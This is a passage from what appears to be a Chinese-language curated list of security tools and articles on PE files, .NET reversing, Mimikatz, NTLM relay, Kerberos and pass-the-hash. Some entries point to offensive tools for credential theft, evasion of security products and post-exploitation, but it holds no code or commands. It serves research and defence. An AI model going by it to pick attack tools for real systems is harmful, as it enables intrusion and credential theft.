[securify] [LEADTOOLS ActiveX control multiple DLL side loading vulnerabilities](https://securify.nl/en/advisory/SFY20150901/leadtools-activex-control-multiple-dll-side-loading-vulnerabilities.html) - 2015.08 [securify] [COM+ Services DLL side loading vulnerability](https://securify.nl/en/advisory/SFY20150801/com_-services-dll-side-loading-vulnerability.html) - 2015.08 [securify] [Microsoft Visio multiple DLL side loading vulnerabilities](https://securify.nl/en/advisory/SFY20150804/microsoft-visio-multiple-dll-side-loading-vulnerabilities.html) - 2015.08 [securify] [OLE DB Provider for Oracle multiple DLL side loading vulnerabilities](https://securify.nl/en/advisory/SFY20150806/ole-db-provider-for-oracle-multiple-dll-side-loading-vulnerabilities.html) - 2015.08 [securify] [Shockwave Flash Object DLL side loading vulnerability](https://securify.nl/en/advisory/SFY20150802/shockwave-flash-object-dll-side-loading-vulnerability.html) - 2015.08 [securify] [Windows Authentication UI DLL side loading vulnerability](https://securify.nl/en/advisory/SFY20150803/windows-authentication-ui-dll-side-loading-vulnerability.html) - 2015.08 [securify] [Event Viewer Snapin multiple DLL side loading vulnerabilities](https://securify.nl/en/advisory/SFY20150805/event-viewer-snapin-multiple-dll-side-loading-vulnerabilities.html) - 2015.06 [securify] [Cisco AnyConnect elevation of privileges via DLL side loading](https://securify.nl/en/advisory/SFY20150601/cisco-anyconnect-elevation-of-privileges-via-dll-side-loading.html) - 2010.08 [microsoft] [An update on the DLL-preloading remote attack vector](https://msrc-blog.microsoft.com/2010/08/31/an-update-on-the-dll-preloading-remote-attack-vector/) # <a id="620af0d32e6ac1f4a3e97385d4d3efc0"></a>PE *** ## <a id="c9d6674c5ab3d9adb7fd295acb7ba7cf"></a>PE解析 ### <a id="3cb6b6d0c5f183fc7beed42c26733e39"></a>工具 - [**904**星][12d] [Py] [erocarrera/pefile](https://github.com/erocarrera/pefile) PE文件读取、解析工具,Python编写 <details> <summary>查看详情</summary> ## 特性 - Inspecting headers - Analysis of sections' data - Retrieving embedded data - Reading strings from the resources - Warnings for suspicious and malformed values - Support to write to some of the fields and to other parts of the PE, so it's possible to do some basic butchering of PEs - Packer detection with PEiD’s signatures - PEiD signature generation </details> ### <a id="f644a8855d53c26fb4f9799d2733c8c8"></a>文章 - 2017.09 [] [Binary offsets, virtual addresses and pefile](https://5d4a.wordpress.com/2017/09/21/binary-offsets-virtual-addresses-and-pefile/) - 2017.03 [] [67,000 cuts with python-pefile](https://0xec.blogspot.com/2017/03/67000-cuts-with-python-pefile.html) - 2009.05 [pediy] [[原创]利用python+pefile库做PE格式文件的快速开发](https://bbs.pediy.com/thread-89838.htm) *** ## <a id="574db8bbaafbee72eeb30e28e2799458"></a>工具 ### <a id="c364a31b0a48b1a528f728def1d3ca05"></a>工具 - [**693**星][15d] [C] [thewover/donut](https://github.com/thewover/donut) 生成位置无关的shellcode(x86,x64或AMD64 + x86),该shellcode从内存中加载.NET程序集、PE文件和其他Windows有效负载,并使用参数运行它们 - 重复区段: [.NET->工具->新添加](#6b8b4bf156e5f973cf0485d45a94f4c4) | - [**407**星][2m] [Assembly] [hasherezade/pe_to_shellcode](https://github.com/hasherezade/pe_to_shellcode) Converts PE into a shellcode - [**399**星][5m] [Jupyter Notebook] [endgameinc/ember](https://github.com/endgameinc/ember) 110万PE文件的数据集合, 可用于训练相关模型. PE文件信息主要包括: SHA256/histogram(直方图)/byteentropy(字节熵)/字符串/PE头信息/段信息/导入表/导出表 - [**372**星][1y] [Assembly] [egebalci/amber](https://github.com/egebalci/amber) 反射式PE加壳器,用于绕过安全产品和缓解措施 - [**342**星][7m] [C] [merces/pev](https://github.com/merces/pev) The PE file analysis toolkit - [**328**星][2m] [VBA] [itm4n/vba-runpe](https://github.com/itm4n/vba-runpe) A VBA implementation of the RunPE technique or how to bypass application whitelisting. - [**327**星][1m] [C++] [trailofbits/pe-parse](https://github.com/trailofbits/pe-parse) Principled, lightweight C/C++ PE parser - [**318**星][20d] [C++] [hasherezade/libpeconv](https://github.com/hasherezade/libpeconv) 用于映射和取消映射PE 文件的库 - [**288**星][9m] [Java] [katjahahn/portex](https://github.com/katjahahn/portex) Java library to analyse Portable Executable files with a special focus on malware analysis and PE malformation robustness *** ## <a id="7e890d391fa32df27beb1377a371518b"></a>文章 ### <a id="bba6a2ee17956c3bd688c16acac5e502"></a>文章 - 2016.08 [3gstudent] [隐写技巧——在PE文件的数字证书中隐藏Payload](https://3gstudent.github.io/3gstudent.github.io/%E9%9A%90%E5%86%99%E6%8A%80%E5%B7%A7-%E5%9C%A8PE%E6%96%87%E4%BB%B6%E7%9A%84%E6%95%B0%E5%AD%97%E8%AF%81%E4%B9%A6%E4%B8%AD%E9%9A%90%E8%97%8FPayload/) - 2016.08 [3gstudent] [隐写技巧——在PE文件的数字证书中隐藏Payload](https://3gstudent.github.io/3gstudent.github.io/%E9%9A%90%E5%86%99%E6%8A%80%E5%B7%A7-%E5%9C%A8PE%E6%96%87%E4%BB%B6%E7%9A%84%E6%95%B0%E5%AD%97%E8%AF%81%E4%B9%A6%E4%B8%AD%E9%9A%90%E8%97%8FPayload/) - 2016.06 [pediy] [[原创]菜鸟对PEid 0.95 Cave 查找功能逆向](https://bbs.pediy.com/thread-211094.htm) - 2016.06 [mzrst] [Professional PE Explorer – PPEE](https://www.mzrst.com/blog/2016/06/15/pe-explorer/) - 2016.06 [pediy] [[翻译]Windows PE文件中的数字签名格式](https://bbs.pediy.com/thread-210709.htm) - 2016.05 [sans] [CVE-2016-2208 Symantec Antivirus Engine Malformed PE Header Parser Memory Access Violation](https://isc.sans.edu/forums/diary/CVE20162208+Symantec+Antivirus+Engine+Malformed+PE+Header+Parser+Memory+Access+Violation/21069/) - 2016.05 [freebuf] [Manalyze:PE文件的静态分析工具](http://www.freebuf.com/sectool/104378.html) - 2016.04 [cyber] [Presenting PeNet: a native .NET library for analyzing PE Headers with PowerShell](https://cyber.wtf/2016/04/18/presenting-penet-a-native-net-library-for-analyzing-pe-headers-with-powershell/) - 2016.02 [pediy] [[原创]64位CreateProcess逆向:(三)PE格式的解析与效验](https://bbs.pediy.com/thread-208101.htm) - 2016.02 [360] [在windows环境下使用Volatility或PE Capture捕捉执行代码(PE/DLL/驱动恶意文件)](https://www.anquanke.com/post/id/83507/) - 2015.12 [secureallthethings] [Add PE Code Signing to Backdoor Factory (BDF)](http://secureallthethings.blogspot.com/2015/12/add-pe-code-signing-to-backdoor-factory.html) - 2015.12 [missmalware] [PE Import Analysis for Beginners and Lazy People](http://missmalware.com/2015/12/pe-import-analysis-for-beginners-and-lazy-people/) - 2015.12 [pediy] [[原创]一个C++的PE文件操作类](https://bbs.pediy.com/thread-206304.htm) - 2015.12 [pediy] [[原创]通过c++代码给PE文件添加一个区段](https://bbs.pediy.com/thread-206197.htm) - 2015.11 [securityblog] [FileAlyzer – Analyze files – Read PE information](http://securityblog.gr/2963/filealyzer-analyze-files-read-pe-information/) - 2015.11 [securityblog] [Read Portable Executable (PE) information](http://securityblog.gr/2960/read-portable-executable-pe-information/) - 2015.11 [freebuf] [逆向工程(二):从一个简单的实例来了解PE文件](http://www.freebuf.com/articles/system/86596.html) - 2015.11 [pediy] [[原创][开源]LordPE框架设计之精简版](https://bbs.pediy.com/thread-206136.htm) - 2015.11 [pediy] [[原创]手查PE重定向](https://bbs.pediy.com/thread-206072.htm) - 2015.11 [pediy] [[原创][开源]Win32控制台解析PE文件](https://bbs.pediy.com/thread-206060.htm) # <a id="b8c834b16722c108f8c30f1b0190f0a1"></a>.NET *** ## <a id="d90b60dc79837e06d8ba2a7ee1f109d3"></a>工具 ### <a id="6b8b4bf156e5f973cf0485d45a94f4c4"></a>新添加 - [**9528**星][19d] [C#] [icsharpcode/ilspy](https://github.com/icsharpcode/ilspy) .NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&more) - cross-platform! - [**3824**星][2m] [C#] [0xd4d/de4dot](https://github.com/0xd4d/de4dot) .NET deobfuscator and unpacker. - [**3278**星][9m] [JS] [sindresorhus/speed-test](https://github.com/sindresorhus/speed-test) Test your internet connection speed and ping using speedtest.net from the CLI - [**2526**星][1y] [C#] [yck1509/confuserex](https://github.com/yck1509/confuserex) An open-source, free protector for .NET applications - [**1811**星][1m] [C#] [sshnet/ssh.net](https://github.com/sshnet/ssh.net) SSH.NET is a Secure Shell (SSH) library for .NET, optimized for parallelism. - [**1696**星][19d] [C#] [jbevain/cecil](https://github.com/jbevain/cecil) C#库, 探查/修改/生成 .NET App/库 - [**1535**星][12d] [C#] [steamre/steamkit](https://github.com/steamre/steamkit) SteamKit2 is a .NET library designed to interoperate with Valve's Steam network. It aims to provide a simple, yet extensible, interface to perform various actions on the network. - [**1415**星][1y] [C++] [dotnet/llilc](https://github.com/dotnet/llilc) This repo contains LLILC, an LLVM based compiler for .NET Core. It includes a set of cross-platform .NET code generation tools that enables compilation of MSIL byte code to LLVM supported platforms. - [**1147**星][9d] [C#] [cobbr/covenant](https://github.com/cobbr/covenant) Covenant is a collaborative .NET C2 framework for red teamers. - [**1135**星][15d] [Boo] [byt3bl33d3r/silenttrinity](https://github.com/byt3bl33d3r/silenttrinity) An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR - [**923**星][12d] [C#] [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net) 生成Payload,恶意利用不安全的 .NET 对象反序列化 - [**818**星][12d] [C#] [proxykit/proxykit](https://github.com/proxykit/proxykit) A toolkit to create code-first HTTP reverse proxies on ASP.NET Core - [**788**星][2m] [C#] [cobbr/sharpsploit](https://github.com/cobbr/sharpsploit) SharpSploit is a .NET post-exploitation library written in C# - [**728**星][3m] [C#] [obfuscar/obfuscar](https://github.com/obfuscar/obfuscar) Open source obfuscation tool for .NET assemblies - [**693**星][15d] [C] [thewover/donut](https://github.com/thewover/donut) 生成位置无关的shellcode(x86,x64或AMD64 + x86),该shellcode从内存中加载.NET程序集、PE文件和其他Windows有效负载,并使用参数运行它们 - 重复区段: [PE->工具->工具](#c364a31b0a48b1a528f728def1d3ca05) | - [**634**星][12d] [HTML] [foxzilla/pxer](https://github.com/foxzilla/pxer) 人人可用的P站爬虫 - [**577**星][10d] [C#] [dabutvin/imgbot](https://github.com/dabutvin/imgbot) An Azure Function solution to crawl through all of your image files in GitHub and losslessly compress them. This will make the file size go down, but leave the dimensions and quality untouched. Once it's done, ImgBot will open a pull request for you to review and merge. [email protected] - [**546**星][24d] [C#] [crosire/scripthookvdotnet](https://github.com/crosire/scripthookvdotnet) An ASI plugin for Grand Theft Auto V, which allows running scripts written in any .NET language in-game. - [**536**星][11d] [Go] [timothyye/godns](https://github.com/timothyye/godns) A dynamic DNS client tool, supports AliDNS, Cloudflare, Google Domains, DNSPod, HE.net & DuckDNS, written in Go. - [**494**星][28d] [C#] [paulbartrum/jurassic](https://github.com/paulbartrum/jurassic) A .NET library to parse and execute JavaScript code. - [**493**星][1m] [C#] [chmorgan/sharppcap](https://github.com/chmorgan/sharppcap) 用于捕获数据包的跨平台 (Windows, Mac, Linux)库,.NET编写 - [**486**星][28d] [C#] [tyranid/oleviewdotnet](https://github.com/tyranid/oleviewdotnet) OLE/COM查看和检测工具,.NET语言编写 - [**424**星][7m] [Java] [nccgroup/freddy](https://github.com/nccgroup/freddy) 自动识别 Java/.NET 应用程序中的反序列化漏洞 - [**386**星][14d] [C#] [addictedcs/soundfingerprinting](https://github.com/addictedcs/soundfingerprinting) .NET中的音频指纹识别。完全用C#编写的高效的声音指纹识别算法。 - [**385**星][19d] [C#] [3f/dllexport](https://github.com/3f/dllexport) .NET DllExport - 重复区段: [DLL->新添加->工具](#9753a9d52e19c69dc119bf03e9d7c3d2) | - [**383**星][2m] [C#] [security-code-scan/security-code-scan](https://github.com/security-code-scan/security-code-scan) Vulnerability Patterns Detector for C# and VB.NET - [**373**星][9d] [C#] [sonarsource/sonar-dotnet](https://github.com/sonarsource/sonar-dotnet) 用于C#和VB.NET语言的静态代码分析器,用作SonarQube和SonarCloud平台的扩展。 - [**366**星][10m] [JS] [nikolayit/openjudgesystem](https://github.com/nikolayit/openjudgesystem) An open source system for online algorithm competitions for Windows, written in ASP.NET MVC - [**357**星][10d] [C#] [tmoonlight/nsmartproxy](https://github.com/tmoonlight/nsmartproxy) 内网穿透工具。采用.NET CORE的全异步模式打造 - [**334**星][10d] [Java] [wiglenet/wigle-wifi-wardriving](https://github.com/wiglenet/wigle-wifi-wardriving) Nethugging client for Android, from wigle.net - [**320**星][1m] [C#] [azuread/azure-activedirectory-library-for-dotnet](https://github.com/azuread/azure-activedirectory-library-for-dotnet) ADAL authentication libraries for .net - [**316**星][10d] [C#] [dahall/vanara](https://github.com/dahall/vanara) A set of .NET libraries for Windows implementing PInvoke calls to many native Windows APIs with supporting wrappers. ### <a id="e26e6693fc840e27099c4363598e02cc"></a>dnspy - [**13163**星][24d] [C#] [0xd4d/dnspy](https://github.com/0xd4d/dnspy) .NET debugger and assembly editor *** ## <a id="2612f712f9363ad0d71fc054c4829396"></a>文章 - 2011.11 [pcsxcetrasupport3] [Converting VB Script To VB.Net](https://pcsxcetrasupport3.wordpress.com/2011/11/12/converting-vb-script-to-vb-net/) - 2011.10 [pediy] [[原创]小小菜鸟爆破IphoneBackupextractor V3.08(.net)](https://bbs.pediy.com/thread-141900.htm) - 2011.06 [pediy] [[原创][.net]修復不能使用的115网盘地址解析工具](https://bbs.pediy.com/thread-136059.htm) - 2011.02 [pediy] [[原创]新发现一个简单有效的.net程序破解方法(可破隐藏IL级别的保护)](https://bbs.pediy.com/thread-129272.htm) - 2010.12 [lowleveldesign] [Writing a .net debugger (part 4) – breakpoints](https://lowleveldesign.org/2010/12/01/writing-a-net-debugger-part-4-breakpoints/) - 2010.11 [pelock] [.netshrink v2.0](https://www.pelock.com/blog/2010/11/30/netshrink-v2-0/) - 2010.11 [lowleveldesign] [Writing a .net debugger (part 3) – symbol and source files](https://lowleveldesign.org/2010/11/08/writing-a-net-debugger-part-3-symbol-and-source-files/) - 2010.11 [sans] [DNSSEC Progress for .com and .net](https://isc.sans.edu/forums/diary/DNSSEC+Progress+for+com+and+net/9883/) - 2010.10 [lowleveldesign] [Writing a .net debugger (part 2) – handling events and creating wrappers](https://lowleveldesign.org/2010/10/22/writing-a-net-debugger-part-2-handling-events-and-creating-wrappers/) - 2010.10 [lowleveldesign] [Writing a .net debugger (part 1) – starting the debugging session](https://lowleveldesign.org/2010/10/11/writing-a-net-debugger-part-1-starting-the-debugging-session/) - 2010.05 [pediy] [[原创].Net内存程序集的DUMP(ProFile篇)](https://bbs.pediy.com/thread-113697.htm) - 2010.01 [pediy] [[原创].net逆向学习总结系列[2.24更新:.net逆向学习总结002(1)]](https://bbs.pediy.com/thread-104845.htm) - 2008.06 [pediy] [[原创]请求加精!绕过.Net 2.0强名称验证,解决混合代码无法反编译的问题。](https://bbs.pediy.com/thread-66392.htm) - 2007.12 [pediy] [[翻译]Win32asm tutorial (Asm.yeah.net)](https://bbs.pediy.com/thread-55784.htm) - 2007.10 [pediy] [[翻译]].Net 下的保护和逆向工程](https://bbs.pediy.com/thread-52738.htm) - 2007.07 [pediy] [[原创].Net 2.0 通用反射脱壳机完整版](https://bbs.pediy.com/thread-47729.htm) - 2007.07 [pediy] [[原创].Net 反射脱壳机核心源代码](https://bbs.pediy.com/thread-47330.htm) - 2007.05 [pediy] [[原创].net jokeme 2](https://bbs.pediy.com/thread-44933.htm) - 2007.04 [pediy] [BSPR .net1.1保护壳 内部测试](https://bbs.pediy.com/thread-42077.htm) - 2007.03 [pediy] [[原创].net的joke me](https://bbs.pediy.com/thread-41424.htm) # <a id="5dc38e490615f91e67ffb2f668c5088a"></a>登录与认证 *** ## <a id="360af8f1497fcc2dfd2e32f2b636d718"></a>Mimikatz ### <a id="17f92a061cc661a040c094c1b3fd32e3"></a>工具 - [**9161**星][11d] [C] [gentilkiwi/mimikatz](https://github.com/gentilkiwi/mimikatz) A little tool to play with Windows security - [**802**星][10d] [Py] [skelsec/pypykatz](https://github.com/skelsec/pypykatz) 纯Python实现的Mimikatz - [**264**星][6m] [C] [portcullislabs/linikatz](https://github.com/portcullislabs/linikatz) UNIX版本的Mimikatz - [**210**星][2m] [C#] [ghostpack/sharpdpapi](https://github.com/ghostpack/sharpdpapi) SharpDPAPI is a C# port of some Mimikatz DPAPI functionality. ### <a id="c9617bf44965290de6f7b645c15328ea"></a>文章 - 2020.01 [matterpreter] [Mimidrv In Depth: Exploring Mimikatz’s Kernel Driver](https://posts.specterops.io/mimidrv-in-depth-4d273d19e148) - 2019.12 [LoiLiangYang] [Access Windows 10 Password with Empire and Mimikatz (Cybersecurity)](https://www.youtube.com/watch?v=saF9epFwzPE) - 2019.12 [specterops] [Mimidrv In Depth: Exploring Mimikatz’s Kernel Driver](https://medium.com/p/4d273d19e148) - 2019.11 [sentinelone] [What is Mimikatz? (And Why Is It So Dangerous?)](https://www.sentinelone.com/blog/what-is-mimikatz-and-why-is-it-so-dangerous/) - 2019.10 [securestate] [No More Mimikatz](https://warroom.rsmus.com/no-more-mimikatz/) - 2019.07 [4hou] [探索Mimikatz神器之SSP](https://www.4hou.com/system/18912.html) - 2019.07 [markmotig] [NetKatz, Mimikatz to Hex and Defender groans but shrugs](https://medium.com/p/157fe8d67bdf) - 2019.07 [4hou] [探索 Mimikatz 神器之 WDigest](https://www.4hou.com/system/18874.html) - 2019.06 [4hou] [Mimikatz中SSP的使用](https://www.4hou.com/technology/18813.html) - 2019.06 [4hou] [Mimikatz中sekurlsa::wdigest的实现](https://www.4hou.com/technology/18811.html) - 2019.06 [HackerSploit] [PowerShell Empire Complete Tutorial For Beginners - Mimikatz & Privilege Escalation](https://www.youtube.com/watch?v=52xkWbDMUUM) - 2019.06 [vulnerablelife] [Defending Windows Domain Against Mimikatz Attacks](https://vulnerablelife.wordpress.com/2019/06/15/defending-windows-domain-against-mimikatz-attacks/) - 2019.06 [360] [深入分析Mimikatz:WDigest](https://www.anquanke.com/post/id/180126/) - 2019.06 [3gstudent] [Mimikatz中SSP的使用](https://3gstudent.github.io/3gstudent.github.io/Mimikatz%E4%B8%ADSSP%E7%9A%84%E4%BD%BF%E7%94%A8/) - 2019.06 [360] [深入分析Mimikatz:SSP](https://www.anquanke.com/post/id/180001/) - 2019.06 [xpnsec] [Exploring Mimikatz - Part 2 - SSP](https://blog.xpnsec.com/exploring-mimikatz-part-2/) - 2019.06 [3gstudent] [Mimikatz中sekurlsa::wdigest的实现](https://3gstudent.github.io/3gstudent.github.io/Mimikatz%E4%B8%ADsekurlsa-wdigest%E7%9A%84%E5%AE%9E%E7%8E%B0/) - 2019.05 [malcomvetter] [Choose Your Own Red Team Adventure: Mimikatz](https://medium.com/p/58b4d7b856c9) - 2019.05 [xpnsec] [Exploring Mimikatz - Part 1 - WDigest](https://blog.xpnsec.com/exploring-mimikatz-part-1/) - 2019.04 [crowdstrike] [Mimikatz in the Wild: Bypassing Signature-Based Detections Using the “AK47 of Cyber”](https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/) *** ## <a id="37557d58c549b4988bf0bb0ada5de975"></a>NTLM ### <a id="6c8194db98591f8f68b790975663bc5a"></a>工具 - [**3097**星][5m] [Py] [spiderlabs/responder](https://github.com/spiderlabs/responder) LLMNR/NBT-NS/MDNS投毒,内置HTTP/SMB/MSSQL/FTP/LDAP认证服务器, 支持NTLMv1/NTLMv2/LMv2 - [**1887**星][1m] [Py] [lgandx/responder](https://github.com/lgandx/responder) LLMNR, NBT-NS, MDNS 投毒工具, 内置 HTTP/SMB/MSSQL/FTP/LDAP 流氓认证服务器,支持 NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP和基础 HTTP认证 - [**781**星][1m] [Py] [lgandx/pcredz](https://github.com/lgandx/pcredz) This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface. - [**744**星][1y] [C#] [eladshamir/internal-monologue](https://github.com/eladshamir/internal-monologue) 在不接触LSASS的情况下提取NTLM hash - [**676**星][1y] [Py] [deepzec/bad-pdf](https://github.com/deepzec/bad-pdf) create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines - [**256**星][2m] [Py] [evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) 修改NTLMv1/NTLMv1-ESS/MSCHAPv1 Hask, 使其可以在hashcat中用DES模式14000破解 - [**252**星][14d] [PS] [notmedic/netntlmtosilverticket](https://github.com/notmedic/netntlmtosilverticket) SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket - [**250**星][11d] [Ruby] [urbanesec/zackattack](https://github.com/urbanesec/ZackAttack) Unveiled at DEF CON 20, NTLM Relaying to ALL THE THINGS! ### <a id="f07067c1b70f9c002838e2f4ab25da7d"></a>文章 - 2019.11 [4hou] [NTLM 中继攻击的几种非主流玩法](https://www.4hou.com/system/21543.html) - 2019.10 [4hou] [NTLM攻击两例](https://www.4hou.com/info/news/21163.html) - 2019.09 [pentestlab] [Microsoft Exchange – NTLM Relay](https://pentestlab.blog/2019/09/09/microsoft-exchange-ntlm-relay/) - 2019.08 [vulnerability0lab] [Windows 10 Net NTLMv2 Credentials Steal with Excel](https://www.youtube.com/watch?v=z5Ki2G579-Y) - 2019.06 [freebuf] [CVE-2019-1040 Windows NTLM篡改漏洞分析](https://www.freebuf.com/vuls/206169.html) - 2019.06 [technicalsyn] [Eternalrelayx.py — Non-Admin NTLM Relaying & ETERNALBLUE Exploitation](https://medium.com/p/dab9e2b97337) - 2019.06 [tencent] [Windows NTLM认证(CVE-2019-1040)漏洞预警](https://s.tencent.com/research/bsafe/738.html) - 2019.06 [4hou] [微软NTLM协议曝出巨大漏洞,现有安全保护措施也无用!](https://www.4hou.com/vulnerable/18512.html) - 2019.06 [preempt] [Security Advisory: Critical Vulnerabilities in NTLM Allow Remote Code Execution and Cloud Resources Compromise](https://blog.preempt.com/security-advisory-critical-vulnerabilities-in-ntlm) - 2019.03 [nsfocus] [【M01N】资源约束委派和NTLM Relaying的组合拳接管域内任意主机系统权限](http://blog.nsfocus.net/combination-resource-constrained-delegation-ntlm-relaying-takes-privileges-host-system-domain/) - 2019.03 [4hou] [结合NTLM中继和Kerberos委派实现域成员机器的提权](https://www.4hou.com/technology/16626.html) - 2019.03 [venus] [利用 Exchange SSRF 漏洞和 NTLM 中继沦陷域控](https://paper.seebug.org/833/) - 2019.03 [knownsec] [利用 Exchange SSRF 漏洞和 NTLM 中继沦陷域控](http://blog.knownsec.com/2019/03/%e5%88%a9%e7%94%a8-exchange-ssrf-%e6%bc%8f%e6%b4%9e%e5%92%8c-ntlm-%e4%b8%ad%e7%bb%a7%e6%b2%a6%e9%99%b7%e5%9f%9f%e6%8e%a7/) - 2019.01 [sans] [Relaying Exchange?s NTLM authentication to domain admin (and more)](https://isc.sans.edu/forums/diary/Relaying+Exchanges+NTLM+authentication+to+domain+admin+and+more/24578/) - 2019.01 [ironcastle] [CERT/CC Reports Microsoft Exchange 2013 and Newer are Vulnerable to NTLM Relay Attacks](https://www.ironcastle.net/certcc-reports-microsoft-exchange-2013-and-newer-are-vulnerable-to-ntlm-relay-attacks/) - 2019.01 [evi1cg] [Remote NTLM relaying through CS](https://evi1cg.me/archives/Remote_NTLM_relaying_through_CS.html) - 2019.01 [freebuf] [Windows环境中使用Responder获取NTLMv2哈希并利用](https://www.freebuf.com/articles/system/194549.html) - 2019.01 [4hou] [通过web应用中的文件下载漏洞窃取NTLMv2哈希](http://www.4hou.com/system/15391.html) - 2018.12 [hitbsecconf] [#HITB2018DXB D2T2: NTLM Relay Is Dead, Long Live NTLM Relay - Jianing Wang and Junyu Zhou](https://www.youtube.com/watch?v=gyR3RQEpfxU) - 2018.12 [ZeroNights] [Jianing Wang, Junyu Zhou - Ntlm Relay Reloaded: Attack methods you do not know](https://www.youtube.com/watch?v=BrSS_0a0vzQ) *** ## <a id="20f86e3e6a4aa7dc1e5a1e3071e0d500"></a>Kerberos ### <a id="fbc6987a538d971f3d85b790fbf0c1e1"></a>工具 - [**728**星][19d] [C#] [ghostpack/rubeus](https://github.com/ghostpack/rubeus) 原始Kerberos交互和滥用,C#编写 - [**617**星][3m] [C] [gentilkiwi/kekeo](https://github.com/gentilkiwi/kekeo) 玩弄 Windows Kerberos 的工具箱 - [**593**星][7m] [Py] [nidem/kerberoast](https://github.com/nidem/kerberoast) 一系列用于攻击MS Kerberos实现的工具 - [**376**星][12d] [Go] [jcmturner/gokrb5](https://github.com/jcmturner/gokrb5) Pure Go Kerberos library for clients and services - [**354**星][2m] [Go] [ropnop/kerbrute](https://github.com/ropnop/kerbrute) A tool to perform Kerberos pre-auth bruteforcing - [**236**星][27d] [Py] [dirkjanm/krbrelayx](https://github.com/dirkjanm/krbrelayx) Kerberos unconstrained delegation abuse toolkit ### <a id="3a746419a4bc22b8a6425b81b6bd4593"></a>文章 - 2020.02 [aliyun] [域渗透——Kerberos委派攻击](https://xz.aliyun.com/t/7217) - 2020.01 [stealthbits] [What is Kerberos Delegation? An Overview of Kerberos Delegation](https://blog.stealthbits.com/what-is-kerberos-delegation-an-overview-of-kerberos-delegation/) - 2020.01 [3gstudent] [渗透技巧——通过Kerberos pre-auth进行用户枚举和口令爆破](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87Kerberos-pre-auth%E8%BF%9B%E8%A1%8C%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E5%92%8C%E5%8F%A3%E4%BB%A4%E7%88%86%E7%A0%B4/) - 2019.10 [4hou] [Kerberos中继攻击:滥用无约束委派(下)](https://www.4hou.com/web/19303.html) - 2019.09 [4hou] [Kerberos中继攻击:滥用无约束委派(上)](https://www.4hou.com/web/19302.html) - 2019.07 [4hou] [Kerberos 委派攻击原理之 S4U2 利用详解](https://www.4hou.com/system/18825.html) - 2019.06 [stealthbits] [What is the Kerberos PAC?](https://blog.stealthbits.com/what-is-the-kerberos-pac/) - 2019.05 [andreafortuna] [Some thoughts about Kerberos Golden Tickets](https://www.andreafortuna.org/2019/05/29/some-thoughts-about-kerberos-silver-tickets/) - 2019.05 [improsec] [The mind-blowing Kerberos "Use Any Authentication Protocol" Delegation](https://improsec.com/tech-blog/the-mind-blowing-kerberos-use-any-authentication-protocol-delegation) - 2019.05 [aliyun] [Kerberos Security](https://xz.aliyun.com/t/5004) - 2019.03 [freebuf] [Kerberos协议探索系列之委派篇](https://www.freebuf.com/articles/system/198381.html) - 2019.03 [tarlogic] [Kerberos (I): How does Kerberos work? – Theory](https://www.tarlogic.com/en/blog/how-kerberos-works/) - 2019.03 [360] [Kerberos协议探索系列之委派篇](https://www.anquanke.com/post/id/173477/) - 2019.03 [ironcastle] [Special Webcast: Purple Kerberos: Current attack strategies & defenses – March 11, 2019 1:00pm US/Eastern](https://www.ironcastle.net/special-webcast-purple-kerberos-current-attack-strategies-defenses-march-11-2019-100pm-us-eastern/) - 2019.03 [freebuf] [Kerberos协议探索系列之票据篇](https://www.freebuf.com/articles/system/197160.html) - 2019.03 [360] [Kerberos协议探索系列之票据篇](https://www.anquanke.com/post/id/172900/) - 2019.03 [freebuf] [Kerberos协议探索系列之扫描与爆破篇](https://www.freebuf.com/articles/system/196434.html) - 2019.02 [360] [Kerberos协议探索系列之扫描与爆破篇](https://www.anquanke.com/post/id/171552/) - 2019.01 [f5] [Troubleshooting Kerberos Constrained Delegation: Strong Encryption Types Allowed for Kerberos](https://devcentral.f5.com/articles/troubleshooting-kerberos-constrained-delegation-strong-encryption-types-allowed-for-kerberos-33250) - 2019.01 [sans] [Attacking Kerberos](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1493862736.pdf) *** ## <a id="2e1fd273eb428694a94396509754acb5"></a>Pass-The-Hash ### <a id="3efc90b9ae87a405e231900020ea33ed"></a>工具 ### <a id="5cbd82fde4af3da6516b88c52d2c357a"></a>文章 - 2020.01 [aliyun] [深入研究Pass-the-Hash攻击与防御](https://xz.aliyun.com/t/7051) - 2019.08 [infosecinstitute] [MITRE ATT&CK vulnerability spotlight: Pass-the-hash](https://resources.infosecinstitute.com/mitre-attck-spotlight-pass-the-hash/) - 2019.04 [4hou] [高级域渗透技术之传递哈希已死-LocalAccountTokenFilterPolicy万岁](https://www.4hou.com/technology/17668.html) - 2019.03 [freebuf] [如何检测Pass-the-Hash攻击?](https://www.freebuf.com/articles/system/197660.html) - 2019.03 [tevora] [About Windows Process/Thread Tokens and Pass The Hash](https://threat.tevora.com/windows-process-and-thread-tokens-primer/) - 2019.02 [stealthbits] [How to Detect Overpass-the-Hash Attacks](https://blog.stealthbits.com/how-to-detect-overpass-the-hash-attacks/) - 2019.02 [swordshield] [Phantom Users: Deception and Pass the Hash Attacks](https://www.swordshield.com/blog/phantom-users-deception-and-pass-the-hash-attacks/) - 2019.02 [swordshield] [Phantom Users: Deception and Pass the Hash Attacks](https://www.swordshield.com/blog/deception-and-pass-the-hash/) - 2019.02 [stealthbits] [How to Detect Pass-the-Hash Attacks](https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/) - 2018.08 [stealthbits] [Deploying Pass-the-Hash Honeypots](https://blog.stealthbits.com/deploying-pass-the-hash-honeypots/) - 2018.07 [stealthbits] [使用蜜罐检测 Pass-the-Hash 攻击](https://blog.stealthbits.com/detecting-pass-the-hash-honeypots/) - 2018.05 [3gstudent] [渗透技巧——Pass the Hash with Remote 